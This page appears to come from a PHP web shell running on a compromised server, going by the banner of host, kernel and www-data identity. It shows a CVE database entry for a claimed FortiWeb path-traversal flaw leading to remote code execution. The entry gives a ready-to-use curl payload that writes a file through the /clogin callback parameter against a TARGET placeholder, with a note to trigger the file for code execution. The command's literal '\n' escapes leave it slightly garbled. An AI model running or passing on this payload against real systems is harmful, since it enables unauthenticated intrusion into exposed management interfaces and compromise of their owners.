Software: Apache/2.4.68 (Debian). PHP/8.2.33 uname -a: Linux 9d2024043b5d 7.0.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 7.0.12-2kali1 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /var/www/html/ drwxrwxrwx | |
|
[← Back to CVE DB] DescriptionPath traversal in the FortiWeb login handler allows an unauthenticated attacker to reach the /clogin?callback= endpoint and overwrite arbitrary files, leading to remote code execution as the web user. Widely chained against exposed FortiGate/FortiWeb management interfaces. PoC / Payload — CVE-2025-25257 curl -sk 'https://TARGET/clogin?callback=../../../../tmp/x' \n -X POST -d 'html=<pre>id</pre>'\n# then trigger the written file to obtain RCE |